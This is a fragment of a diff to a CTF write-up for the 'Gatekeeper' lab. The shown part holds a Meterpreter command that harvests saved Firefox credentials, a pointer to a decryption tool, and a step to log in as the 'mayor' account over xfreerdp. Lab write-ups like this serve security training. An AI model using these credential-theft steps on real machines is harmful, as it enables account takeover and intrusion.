tymyrddin/red-bo/source/docs/ctf/gatekeeper.md

 meterpreter > run post/windows/gather/firefox_creds
 ```

-Then use the [Firefox Decrypt tool from Github](https://github.com/unode/firefox_decrypt), and log in to the "mayor"
+Then use the [Firefox Decrypt tool from Github](https://github.com/unode/firefox_decrypt), and log in to the `mayor`
-account using `psexec`.
+account using `xfreerdp`.
+The flag is on mayor's Desktop.